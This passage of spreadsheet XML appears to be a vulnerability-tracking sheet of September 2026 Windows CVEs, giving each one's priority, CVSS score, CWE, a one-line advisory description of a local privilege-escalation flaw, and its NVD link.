      <c r="Q520" s="5" t="inlineStr"/>
      <c r="R520" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S520" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69456</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69459</t>
        </is>
      </c>
      <c r="D521" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E521" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F521" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G521" s="5" t="inlineStr"/>
      <c r="H521" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I521" s="5" t="inlineStr"/>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr"/>
      <c r="L521" s="5" t="inlineStr"/>
      <c r="M521" s="5" t="inlineStr"/>
      <c r="N521" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O521" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P521" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q521" s="5" t="inlineStr"/>
      <c r="R521" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S521" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Power Dependency Coordinator allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69459</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69467</t>
        </is>
      </c>
      <c r="D522" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E522" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F522" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G522" s="5" t="inlineStr"/>
      <c r="H522" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I522" s="5" t="inlineStr"/>
      <c r="J522" s="5" t="inlineStr"/>
      <c r="K522" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L522" s="5" t="inlineStr"/>
      <c r="M522" s="5" t="inlineStr"/>
      <c r="N522" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O522" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P522" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q522" s="5" t="inlineStr"/>
      <c r="R522" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S522" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69467</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69475</t>
        </is>
      </c>
      <c r="D523" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E523" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F523" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G523" s="5" t="inlineStr"/>
      <c r="H523" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I523" s="5" t="inlineStr"/>
      <c r="J523" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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23" s="5" t="inlineStr"/>
      <c r="M523" s="5" t="inlineStr"/>
      <c r="N523" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O523" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P523" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q523" s="5" t="inlineStr"/>
      <c r="R523" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S523" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69475</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69476</t>
        </is>
      </c>
      <c r="D524" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E524" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F524" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G524" s="5" t="inlineStr"/>
      <c r="H524" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I524" s="5" t="inlineStr"/>
      <c r="J524" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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24" s="5" t="inlineStr"/>
      <c r="M524" s="5" t="inlineStr"/>
      <c r="N524" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O524" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P524" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q524" s="5" t="inlineStr"/>
      <c r="R524" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S524" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69476</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69478</t>
        </is>
      </c>
      <c r="D525" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E525" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F525" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G525" s="5" t="inlineStr"/>
      <c r="H525" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I525" s="5" t="inlineStr"/>
      <c r="J525" s="5" t="inlineStr"/>
      <c r="K525" s="5" t="inlineStr"/>
      <c r="L525" s="5" t="inlineStr"/>
      <c r="M525" s="5" t="inlineStr"/>
      <c r="N525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O525" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P525" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q525" s="5" t="inlineStr"/>
      <c r="R525" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S525" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69478</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69480</t>
        </is>
      </c>
      <c r="D526" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E526" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F526" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G526" s="5" t="inlineStr"/>
      <c r="H526" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I526" s="5" t="inlineStr"/>
      <c r="J526" s="5" t="inlineStr"/>
      <c r="K526" s="5" t="inlineStr"/>
      <c r="L526" s="5" t="inlineStr"/>
      <c r="M526" s="5" t="inlineStr"/>
      <c r="N526" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O526" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P526" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q526" s="5" t="inlineStr"/>
      <c r="R526" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S526" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69480</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69489</t>
        </is>
      </c>
      <c r="D527" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E527" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F527" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G527" s="5" t="inlineStr"/>
      <c r="H527" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I527" s="5" t="inlineStr"/>
      <c r="J527" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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27" s="5" t="inlineStr"/>
      <c r="M527" s="5" t="inlineStr"/>
      <c r="N527" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O527" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P527" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q527" s="5" t="inlineStr"/>
      <c r="R527" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S527" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69489</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69508</t>
        </is>
      </c>
      <c r="D528" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E528" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F528" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G528" s="5" t="inlineStr"/>
      <c r="H528" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I528" s="5" t="inlineStr"/>
      <c r="J528" s="5" t="inlineStr"/>
      <c r="K528" s="5" t="inlineStr"/>
      <c r="L528" s="5" t="inlineStr"/>
      <c r="M528" s="5" t="inlineStr"/>
      <c r="N528" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O528" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P528" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q528" s="5" t="inlineStr"/>
      <c r="R528" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S528" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69508</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69509</t>
        </is>
      </c>
      <c r="D529" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E529" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F529" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G529" s="5" t="inlineStr"/>
      <c r="H529" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I529" s="5" t="inlineStr"/>
      <c r="J529" s="5" t="inlineStr"/>
      <c r="K529" s="5" t="inlineStr"/>
      <c r="L529" s="5" t="inlineStr"/>
      <c r="M529" s="5" t="inlineStr"/>
      <c r="N529" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O529" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P529" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q529" s="5" t="inlineStr"/>
      <c r="R529" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S529" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69509</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69513</t>
        </is>
      </c>
      <c r="D530" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E530" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F530" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G530" s="5" t="inlineStr"/>
      <c r="H530" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I530" s="5" t="inlineStr"/>
      <c r="J530" s="5" t="inlineStr"/>
      <c r="K530" s="5" t="inlineStr"/>
      <c r="L530" s="5" t="inlineStr"/>
      <c r="M530" s="5" t="inlineStr"/>
      <c r="N530" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O530" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P530" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q530" s="5" t="inlineStr"/>
      <c r="R530" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S530" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69513</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69528</t>
        </is>
      </c>
      <c r="D531" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E531" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F531" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G531" s="5" t="inlineStr"/>
      <c r="H531" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I531" s="5" t="inlineStr"/>
      <c r="J531" s="5" t="inlineStr"/>
      <c r="K531" s="5" t="inlineStr"/>
      <c r="L531" s="5" t="inlineStr"/>
      <c r="M531" s="5" t="inlineStr"/>
      <c r="N531" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O531" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P531" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q531" s="5" t="inlineStr"/>
      <c r="R531" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S531" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69528</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69532</t>
        </is>
      </c>
      <c r="D532" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E532" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F532" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G532" s="5" t="inlineStr"/>
      <c r="H532" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I532" s="5" t="inlineStr"/>
      <c r="J532" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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32" s="5" t="inlineStr"/>
      <c r="M532" s="5" t="inlineStr"/>
      <c r="N532" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O532" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P532" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q532" s="5" t="inlineStr"/>
      <c r="R532" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S532" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69532</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69534</t>
        </is>
      </c>
      <c r="D533" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E533" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F533" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G533" s="5" t="inlineStr"/>
      <c r="H533" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I533" s="5" t="inlineStr"/>
      <c r="J533" s="5" t="inlineStr"/>
      <c r="K533" s="5" t="inlineStr"/>
      <c r="L533" s="5" t="inlineStr"/>
      <c r="M533" s="5" t="inlineStr"/>
      <c r="N533" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O533" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P533" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q533" s="5" t="inlineStr"/>
      <c r="R533" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S533" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69534</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69535</t>
        </is>
      </c>
      <c r="D534" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E534" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F534" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G534" s="5" t="inlineStr"/>
      <c r="H534" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I534" s="5" t="inlineStr"/>
      <c r="J534" s="5" t="inlineStr"/>
      <c r="K534" s="5" t="inlineStr"/>
      <c r="L534" s="5" t="inlineStr"/>
      <c r="M534" s="5" t="inlineStr"/>
      <c r="N534" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O534" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P534" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q534" s="5" t="inlineStr"/>
      <c r="R534" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="S534" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69535</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69538</t>
        </is>
      </c>
      <c r="D535" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E535" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F535" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G535" s="5" t="inlineStr"/>
      <c r="H535" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I535" s="5" t="inlineStr"/>
      <c r="J535" s="5" t="inlineStr"/>
      <c r="K535" s="5" t="inlineStr"/>
      <c r="L535" s="5" t="inlineStr"/>
      <c r="M535" s="5" t="inlineStr"/>
      <c r="N535" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O535" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P535" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q535" s="5" t="inlineStr"/>
      <c r="R535" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S535" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69538</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69541</t>
        </is>
      </c>
      <c r="D536" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E536" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F536" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G536" s="5" t="inlineStr"/>
      <c r="H536" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I536" s="5" t="inlineStr"/>
      <c r="J536" s="5" t="inlineStr"/>
      <c r="K536" s="5" t="inlineStr"/>
      <c r="L536" s="5" t="inlineStr"/>
      <c r="M536" s="5" t="inlineStr"/>
      <c r="N536" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O536" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P536" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q536" s="5" t="inlineStr"/>
      <c r="R536" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S536" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69541</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69542</t>
        </is>
      </c>
      <c r="D537" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E537" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F537" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G537" s="5" t="inlineStr"/>
      <c r="H537" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I537" s="5" t="inlineStr"/>
      <c r="J537" s="5" t="inlineStr"/>
      <c r="K537" s="5" t="inlineStr"/>
      <c r="L537" s="5" t="inlineStr"/>
      <c r="M537" s="5" t="inlineStr"/>
      <c r="N537" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O537" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P537" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q537" s="5" t="inlineStr"/>
      <c r="R537" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S537" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Camera Frame Server Monitor allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69542</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69544</t>
        </is>
      </c>
      <c r="D538" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E538" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
